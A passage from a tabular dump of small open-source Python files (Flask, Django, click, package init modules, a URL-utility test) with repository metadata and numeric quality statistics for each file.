| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
2b52b55339195e4d6dd601bd2212436101072129
| 27
|
py
|
Python
|
video_cropper/__main__.py
|
jbohnslav/video_cropper
|
76b9aa52982f40289f4bdad8e6aa4016d9770c8b
|
[
"MIT"
] | null | null | null |
video_cropper/__main__.py
|
jbohnslav/video_cropper
|
76b9aa52982f40289f4bdad8e6aa4016d9770c8b
|
[
"MIT"
] | null | null | null |
video_cropper/__main__.py
|
jbohnslav/video_cropper
|
76b9aa52982f40289f4bdad8e6aa4016d9770c8b
|
[
"MIT"
] | null | null | null |
from .gui import run
run()
| 9
| 20
| 0.703704
| 5
| 27
| 3.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.185185
| 27
| 3
| 21
| 9
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
996161adb4ed5a6b0e4dcbd20c8216465d2e5f39
| 277
|
py
|
Python
|
chakin/commands/cmd_load.py
|
dreyes17/python-chado
|
94f77b1db95010ff4629b869ea5849fcc943a18c
|
[
"MIT"
] | 8
|
2017-09-08T15:19:26.000Z
|
2022-02-23T17:28:01.000Z
|
chakin/commands/cmd_load.py
|
dreyes17/python-chado
|
94f77b1db95010ff4629b869ea5849fcc943a18c
|
[
"MIT"
] | 9
|
2018-02-07T18:14:41.000Z
|
2022-03-03T13:14:32.000Z
|
chakin/commands/cmd_load.py
|
dreyes17/python-chado
|
94f77b1db95010ff4629b869ea5849fcc943a18c
|
[
"MIT"
] | 5
|
2018-09-28T08:03:52.000Z
|
2022-03-02T17:51:32.000Z
|
import click
from chakin.commands.load.blast import cli as blast
from chakin.commands.load.go import cli as go
from chakin.commands.load.interpro import cli as interpro
@click.group()
def cli():
pass
cli.add_command(blast)
cli.add_command(go)
cli.add_command(interpro)
| 18.466667
| 57
| 0.783394
| 46
| 277
| 4.652174
| 0.347826
| 0.140187
| 0.252336
| 0.308411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126354
| 277
| 14
| 58
| 19.785714
| 0.884298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| true
| 0.1
| 0.4
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
999853a538991be7fd4fbbeaf06162f0eea353bc
| 56
|
py
|
Python
|
german/__init__.py
|
jfilter/german-preprocessing
|
18c340bc9a1d43e1bfb636103fabb78dddf4969c
|
[
"MIT"
] | 5
|
2019-07-31T09:39:06.000Z
|
2021-08-03T14:25:46.000Z
|
german/__init__.py
|
jfilter/german-preprocessing
|
18c340bc9a1d43e1bfb636103fabb78dddf4969c
|
[
"MIT"
] | 1
|
2021-05-02T15:54:27.000Z
|
2021-05-02T15:54:27.000Z
|
german/__init__.py
|
jfilter/german-preprocessing
|
18c340bc9a1d43e1bfb636103fabb78dddf4969c
|
[
"MIT"
] | null | null | null |
from .preprocessing import preprocess, clean, lemmatize
| 28
| 55
| 0.839286
| 6
| 56
| 7.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 56
| 1
| 56
| 56
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5116787b937a73d901b3131c1947a272c986a8cd
| 185
|
py
|
Python
|
core/__init__.py
|
xieguo/sublime_db
|
f2a7b0e55e9f0b77b90a9aa2ea4c4f9136db1315
|
[
"MIT"
] | 1
|
2019-01-21T17:37:32.000Z
|
2019-01-21T17:37:32.000Z
|
core/__init__.py
|
xieguo/sublime_db
|
f2a7b0e55e9f0b77b90a9aa2ea4c4f9136db1315
|
[
"MIT"
] | null | null | null |
core/__init__.py
|
xieguo/sublime_db
|
f2a7b0e55e9f0b77b90a9aa2ea4c4f9136db1315
|
[
"MIT"
] | null | null | null |
from .core import *
from .sublime import *
from .event import Handle, Event, EventDispatchMain
def startup () -> None:
start_event_loop()
def shutdown () -> None:
stop_event_loop()
| 18.5
| 51
| 0.724324
| 24
| 185
| 5.416667
| 0.583333
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 185
| 10
| 52
| 18.5
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.428571
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
51319854fa069b39ac89997b66510992b67aa401
| 236
|
py
|
Python
|
jetavator/sql_model/__init__.py
|
jetavator/jetavator
|
6edc7b57532809f9903735c333544658631252b5
|
[
"Apache-2.0"
] | null | null | null |
jetavator/sql_model/__init__.py
|
jetavator/jetavator
|
6edc7b57532809f9903735c333544658631252b5
|
[
"Apache-2.0"
] | 86
|
2020-04-11T18:03:32.000Z
|
2021-06-15T14:48:45.000Z
|
jetavator/sql_model/__init__.py
|
jetavator/jetavator
|
6edc7b57532809f9903735c333544658631252b5
|
[
"Apache-2.0"
] | null | null | null |
from .SatelliteOwnerModel import SatelliteOwnerModel
from .HubModel import HubModel
from .LinkModel import LinkModel
from .SatelliteModel import SatelliteModel
from .SourceModel import SourceModel
from .ProjectModel import ProjectModel
| 33.714286
| 52
| 0.872881
| 24
| 236
| 8.583333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 236
| 6
| 53
| 39.333333
| 0.971698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
513de41f0d03dc751a5826c48a698c35f7862034
| 108
|
py
|
Python
|
aphla/machines/nsls2v3bsrline/__init__.py
|
NSLS-II/aphla
|
ceb5410dc836a8fb16321b6dc5e10d442be765c5
|
[
"BSD-3-Clause"
] | null | null | null |
aphla/machines/nsls2v3bsrline/__init__.py
|
NSLS-II/aphla
|
ceb5410dc836a8fb16321b6dc5e10d442be765c5
|
[
"BSD-3-Clause"
] | 1
|
2020-02-17T18:56:18.000Z
|
2020-02-20T17:06:20.000Z
|
aphla/machines/nsls2v3bsrline/__init__.py
|
NSLS-II/aphla
|
ceb5410dc836a8fb16321b6dc5e10d442be765c5
|
[
"BSD-3-Clause"
] | 1
|
2021-03-08T16:07:11.000Z
|
2021-03-08T16:07:11.000Z
|
"""
NSLS2V3 BSR Line
-----------------
"""
# :author: Lingyun Yang <lyyang@bnl.gov>
from lattice import *
| 12
| 40
| 0.555556
| 12
| 108
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021978
| 0.157407
| 108
| 8
| 41
| 13.5
| 0.637363
| 0.685185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5165926046e2f4d0939f4031a82105080d8f4060
| 110
|
py
|
Python
|
src/AIEngine/__init__.py
|
jonathanyeh0723/meme-generator
|
7f50efda871a4375aabe47fdeb5e5a8f673c7c11
|
[
"Apache-2.0"
] | 1
|
2021-08-13T07:38:27.000Z
|
2021-08-13T07:38:27.000Z
|
src/AIEngine/__init__.py
|
jonathanyeh0723/meme-generator
|
7f50efda871a4375aabe47fdeb5e5a8f673c7c11
|
[
"Apache-2.0"
] | null | null | null |
src/AIEngine/__init__.py
|
jonathanyeh0723/meme-generator
|
7f50efda871a4375aabe47fdeb5e5a8f673c7c11
|
[
"Apache-2.0"
] | null | null | null |
"""Lets the Python know that a directory contains code for a Python module."""
from .AIEngine import AIEngine
| 36.666667
| 78
| 0.772727
| 17
| 110
| 5
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154545
| 110
| 2
| 79
| 55
| 0.913978
| 0.654545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
516670ed7d3d3ac1c7190b020615414f538db4e0
| 61
|
py
|
Python
|
scraper_pipeline/exception/connection_exception.py
|
rlrossiter/scraper-pipeline
|
cdbf54a3f794fcedf9408f5453f87d87c3cda89a
|
[
"MIT"
] | 1
|
2021-01-22T18:13:58.000Z
|
2021-01-22T18:13:58.000Z
|
scraper_pipeline/exception/connection_exception.py
|
rlrossiter/scraper-pipeline
|
cdbf54a3f794fcedf9408f5453f87d87c3cda89a
|
[
"MIT"
] | 5
|
2021-02-02T07:41:04.000Z
|
2021-02-02T07:47:44.000Z
|
scraper_pipeline/exception/connection_exception.py
|
rlrossiter/scraper-pipeline
|
cdbf54a3f794fcedf9408f5453f87d87c3cda89a
|
[
"MIT"
] | null | null | null |
class ConnectionNotEstablishedException(Exception):
pass
| 20.333333
| 51
| 0.836066
| 4
| 61
| 12.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114754
| 61
| 2
| 52
| 30.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
5a98ac47b981a683c2a2290479a65238a0b87f8c
| 1,305
|
py
|
Python
|
tests/unit/test_http_utils.py
|
doytsujin/localstack
|
46ffd646af553f381cc567e4a7a06f604640c1c7
|
[
"Apache-2.0"
] | 1
|
2021-07-11T09:40:53.000Z
|
2021-07-11T09:40:53.000Z
|
tests/unit/test_http_utils.py
|
doytsujin/localstack
|
46ffd646af553f381cc567e4a7a06f604640c1c7
|
[
"Apache-2.0"
] | 43
|
2021-09-08T19:03:36.000Z
|
2021-10-07T01:47:05.000Z
|
tests/unit/test_http_utils.py
|
lambdafunc/localstack
|
6285b43bec57435a2179310a8de2af8d8d8cf8dd
|
[
"Apache-2.0"
] | null | null | null |
from localstack.utils import http_utils
def test_add_query_params_to_url():
tt = [
{
"uri": "http://localhost.localstack.cloud",
"query_params": {"param": "122323"},
"expected": "http://localhost.localstack.cloud?param=122323",
},
{
"uri": "http://localhost.localstack.cloud?foo=bar",
"query_params": {"param": "122323"},
"expected": "http://localhost.localstack.cloud?foo=bar¶m" "=122323",
},
{
"uri": "http://localhost.localstack.cloud/foo/bar",
"query_params": {"param": "122323"},
"expected": "http://localhost.localstack.cloud/foo/bar?param" "=122323",
},
{
"uri": "http://localhost.localstack.cloud/foo/bar?foo=bar",
"query_params": {"param": "122323"},
"expected": "http://localhost.localstack.cloud/foo/bar?foo=bar" "¶m=122323",
},
{
"uri": "http://localhost.localstack.cloud?foo=bar",
"query_params": {"foo": "bar"},
"expected": "http://localhost.localstack.cloud?foo=bar",
},
]
for t in tt:
result = http_utils.add_query_params_to_url(t["uri"], t["query_params"])
assert result == t["expected"]
| 35.27027
| 92
| 0.537931
| 133
| 1,305
| 5.150376
| 0.195489
| 0.09635
| 0.335766
| 0.408759
| 0.840876
| 0.740146
| 0.740146
| 0.678832
| 0.678832
| 0.594161
| 0
| 0.050901
| 0.277395
| 1,305
| 36
| 93
| 36.25
| 0.675504
| 0
| 0
| 0.1875
| 0
| 0
| 0.498084
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.03125
| false
| 0
| 0.03125
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
5aa2d090272b957f636e44830b95a53df10239f7
| 168
|
py
|
Python
|
src/rl/np/factories/__init__.py
|
djjh/reinforcement-learning-labs
|
22706dab9e7f16e364ee4ed79c0bd67a343e5b08
|
[
"MIT"
] | 1
|
2019-10-06T11:45:52.000Z
|
2019-10-06T11:45:52.000Z
|
src/rl/tf/factories/__init__.py
|
djjh/reinforcement-learning-labs
|
22706dab9e7f16e364ee4ed79c0bd67a343e5b08
|
[
"MIT"
] | null | null | null |
src/rl/tf/factories/__init__.py
|
djjh/reinforcement-learning-labs
|
22706dab9e7f16e364ee4ed79c0bd67a343e5b08
|
[
"MIT"
] | null | null | null |
from .input_factory import InputFactory
from .policy_factory import PolicyFactory
from .probability_distribution_type_factory import ProbabilityDistributionTypeFactory
| 42
| 85
| 0.910714
| 17
| 168
| 8.705882
| 0.647059
| 0.263514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 168
| 3
| 86
| 56
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
5ad3b57846dac22e161ae7e897c41e56bde08747
| 111
|
py
|
Python
|
labs/tony-thursday-15-jg107/shapes.py
|
TonyJenkins/lbu-python-code
|
d02d843290e887d016cdb05ddc1a8639874f2e06
|
[
"Unlicense"
] | 2
|
2021-08-20T13:02:45.000Z
|
2021-10-03T20:34:45.000Z
|
labs/tony-thursday-15-jg107/shapes.py
|
TonyJenkins/lbu-python-code
|
d02d843290e887d016cdb05ddc1a8639874f2e06
|
[
"Unlicense"
] | null | null | null |
labs/tony-thursday-15-jg107/shapes.py
|
TonyJenkins/lbu-python-code
|
d02d843290e887d016cdb05ddc1a8639874f2e06
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
import shape_areas
if __name__ == '__main__':
print(shape_areas.square_area(3))
| 12.333333
| 37
| 0.711712
| 16
| 111
| 4.25
| 0.875
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021277
| 0.153153
| 111
| 8
| 38
| 13.875
| 0.702128
| 0.189189
| 0
| 0
| 0
| 0
| 0.089888
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
5afc279e64ee178890dd5eadfbc372dcb63c100c
| 58
|
py
|
Python
|
thirteen/one_fred.py
|
frrad/eopi
|
ff5d1c40c721edd16480a98e07fb36f47f2416bf
|
[
"MIT"
] | null | null | null |
thirteen/one_fred.py
|
frrad/eopi
|
ff5d1c40c721edd16480a98e07fb36f47f2416bf
|
[
"MIT"
] | 7
|
2018-06-04T16:28:49.000Z
|
2018-07-09T01:35:24.000Z
|
thirteen/one_fred.py
|
frrad/eopi
|
ff5d1c40c721edd16480a98e07fb36f47f2416bf
|
[
"MIT"
] | null | null | null |
def hack(x, y):
return list(sorted(list(set(x + y))))
| 19.333333
| 41
| 0.586207
| 11
| 58
| 3.090909
| 0.727273
| 0.117647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189655
| 58
| 2
| 42
| 29
| 0.723404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
51777f3c31b0418064341e14c3f20529b298a22d
| 191
|
py
|
Python
|
introduction_to_python/introduction_to_flask/app.py
|
techmodal/pysesh
|
28f0680dca0497466a83790c0d9325ad1d66f6f9
|
[
"MIT"
] | 1
|
2019-11-29T15:26:41.000Z
|
2019-11-29T15:26:41.000Z
|
introduction_to_python/introduction_to_flask/app.py
|
techmodal/pysesh
|
28f0680dca0497466a83790c0d9325ad1d66f6f9
|
[
"MIT"
] | null | null | null |
introduction_to_python/introduction_to_flask/app.py
|
techmodal/pysesh
|
28f0680dca0497466a83790c0d9325ad1d66f6f9
|
[
"MIT"
] | 1
|
2021-02-20T19:08:02.000Z
|
2021-02-20T19:08:02.000Z
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
@app.route('/hello/<name>')
def hello_name(name=None):
return "Hello " + name + "!"
| 17.363636
| 32
| 0.633508
| 26
| 191
| 4.461538
| 0.423077
| 0.232759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172775
| 191
| 10
| 33
| 19.1
| 0.734177
| 0
| 0
| 0
| 0
| 0
| 0.172775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.125
| 0.25
| 0.625
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
5197b78b0ba60f23cea9615960ef4d2583014b16
| 235
|
py
|
Python
|
studentdb/model.py
|
zhengjiejiang/homework
|
3b675006c91b220fa9091a931ae7647042c59342
|
[
"BSD-3-Clause"
] | null | null | null |
studentdb/model.py
|
zhengjiejiang/homework
|
3b675006c91b220fa9091a931ae7647042c59342
|
[
"BSD-3-Clause"
] | null | null | null |
studentdb/model.py
|
zhengjiejiang/homework
|
3b675006c91b220fa9091a931ae7647042c59342
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
class StudentDB(models.Model):
fisrtname = models.CharField(max_length = 50)
lastname = models.CharField(max_length = 50)
age = models.FloatField()
email = models.CharField(max_length=100)
| 29.375
| 49
| 0.731915
| 30
| 235
| 5.633333
| 0.6
| 0.266272
| 0.319527
| 0.426036
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.165957
| 235
| 7
| 50
| 33.571429
| 0.826531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
51a6513f7187d3e71fad4bc098e85819f0a7e7eb
| 145
|
py
|
Python
|
src/games/pagination.py
|
vinicius91/django-rest-framework-api
|
c3fc22eec083c5dac49798cbe89ddc20eb967247
|
[
"MIT"
] | 10
|
2019-07-30T17:20:23.000Z
|
2021-11-08T13:10:50.000Z
|
restful_python_section_08/gamesapi/games/pagination.py
|
hackeziah/Building-RESTful-Python-Web-Services-with-Django
|
d795910a09000f07b962a7edad287df0fed2a362
|
[
"MIT"
] | 8
|
2020-06-06T00:43:02.000Z
|
2022-02-10T11:52:43.000Z
|
posts_api_v1/pagination.py
|
ilearnToday/django_series
|
aaff52cade1ac45e459d9a5e0bade8c16b53e248
|
[
"MIT"
] | 4
|
2019-05-19T11:36:31.000Z
|
2021-07-13T01:04:56.000Z
|
from rest_framework.pagination import LimitOffsetPagination
class LimitOffsetPaginationWithMaxLimit(LimitOffsetPagination):
max_limit = 10
| 24.166667
| 63
| 0.862069
| 12
| 145
| 10.25
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 0.103448
| 145
| 5
| 64
| 29
| 0.930769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
51d52fd98a18f2118ec98f186bd532d9ebac1e3b
| 389
|
py
|
Python
|
tracker/views.py
|
Elephant34/HomeworkTracker
|
006d648761320d1d4328100aeaf881b942bd92f8
|
[
"MIT"
] | null | null | null |
tracker/views.py
|
Elephant34/HomeworkTracker
|
006d648761320d1d4328100aeaf881b942bd92f8
|
[
"MIT"
] | null | null | null |
tracker/views.py
|
Elephant34/HomeworkTracker
|
006d648761320d1d4328100aeaf881b942bd92f8
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required(login_url='/accounts/login/')
def home(request):
return render(request, 'tracker/home.html', {})
def about(request):
return render(request, 'tracker/about.html', {})
def account(request):
return render(request, "tracker/account.html", {})
| 29.923077
| 57
| 0.742931
| 50
| 389
| 5.72
| 0.48
| 0.136364
| 0.199301
| 0.272727
| 0.346154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118252
| 389
| 13
| 58
| 29.923077
| 0.833819
| 0.059126
| 0
| 0
| 0
| 0
| 0.194521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.222222
| 0.333333
| 0.888889
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
a40ae7198de46aeb0482d0cc1bf5bbd58a5b0583
| 862
|
py
|
Python
|
convolutional_rnn/__init__.py
|
fjbriones/emotalkingface
|
4c5c7acda66c8ba78b202c75a73f7066ec2fda1c
|
[
"MIT"
] | 28
|
2021-06-28T02:52:08.000Z
|
2022-03-29T02:53:49.000Z
|
convolutional_rnn/__init__.py
|
ramizf/emotalkingface
|
d3d838be705ea74d4165891720739d749aaf38a5
|
[
"MIT"
] | 8
|
2021-08-19T00:40:06.000Z
|
2022-03-22T21:15:58.000Z
|
convolutional_rnn/__init__.py
|
ramizf/emotalkingface
|
d3d838be705ea74d4165891720739d749aaf38a5
|
[
"MIT"
] | 11
|
2021-07-24T16:06:45.000Z
|
2022-03-30T07:45:01.000Z
|
from .module import Conv1dRNN
from .module import Conv1dLSTM
from .module import Conv1dPeepholeLSTM
from .module import Conv1dGRU
from .module import Conv2dRNN
from .module import Conv2dLSTM
from .module import Conv2dPeepholeLSTM
from .module import Conv2dGRU
from .module import Conv3dRNN
from .module import Conv3dLSTM
from .module import Conv3dPeepholeLSTM
from .module import Conv3dGRU
from .module import Conv1dRNNCell
from .module import Conv1dLSTMCell
from .module import Conv1dPeepholeLSTMCell
from .module import Conv1dGRUCell
from .module import Conv2dRNNCell
from .module import Conv2dLSTMCell
from .module import Conv2dPeepholeLSTMCell
from .module import Conv2dGRUCell
from .module import Conv3dRNNCell
from .module import Conv3dLSTMCell
from .module import Conv3dPeepholeLSTMCell
from .module import Conv3dGRUCell
| 28.733333
| 43
| 0.821346
| 96
| 862
| 7.375
| 0.28125
| 0.338983
| 0.542373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.032787
| 0.150812
| 862
| 29
| 44
| 29.724138
| 0.934426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
a40aebdeedc0d9d3d21cdcda70a977cc861a699c
| 134
|
py
|
Python
|
appmap/test/data/pytest/test_simple.py
|
virajkanwade/appmap-python
|
5ca806f9b23d2f80b53e7644c88a1cca18ab2f37
|
[
"MIT"
] | null | null | null |
appmap/test/data/pytest/test_simple.py
|
virajkanwade/appmap-python
|
5ca806f9b23d2f80b53e7644c88a1cca18ab2f37
|
[
"MIT"
] | 1
|
2021-03-13T05:09:56.000Z
|
2021-03-13T05:09:56.000Z
|
appmap/test/data/pytest/test_simple.py
|
virajkanwade/appmap-python
|
5ca806f9b23d2f80b53e7644c88a1cca18ab2f37
|
[
"MIT"
] | null | null | null |
import os
def test_hello_world():
import simple
os.chdir('/tmp')
assert simple.Simple().hello_world() == 'Hello world!'
| 16.75
| 58
| 0.656716
| 18
| 134
| 4.722222
| 0.555556
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19403
| 134
| 7
| 59
| 19.142857
| 0.787037
| 0
| 0
| 0
| 0
| 0
| 0.119403
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
cfc8ddb00f4cf7a76141ac696da71bc37f5d637a
| 38
|
py
|
Python
|
xautoml/handlers.py
|
Ennosigaeon/xautoml
|
6e49ee8b2ffb6d19dcfd9cbe8b3397416c9b5ded
|
[
"BSD-3-Clause"
] | 4
|
2022-02-27T08:54:08.000Z
|
2022-03-30T21:19:29.000Z
|
xautoml/handlers.py
|
Ennosigaeon/xautoml
|
6e49ee8b2ffb6d19dcfd9cbe8b3397416c9b5ded
|
[
"BSD-3-Clause"
] | 1
|
2022-02-28T09:41:00.000Z
|
2022-03-02T07:44:17.000Z
|
xautoml/handlers.py
|
Ennosigaeon/xautoml
|
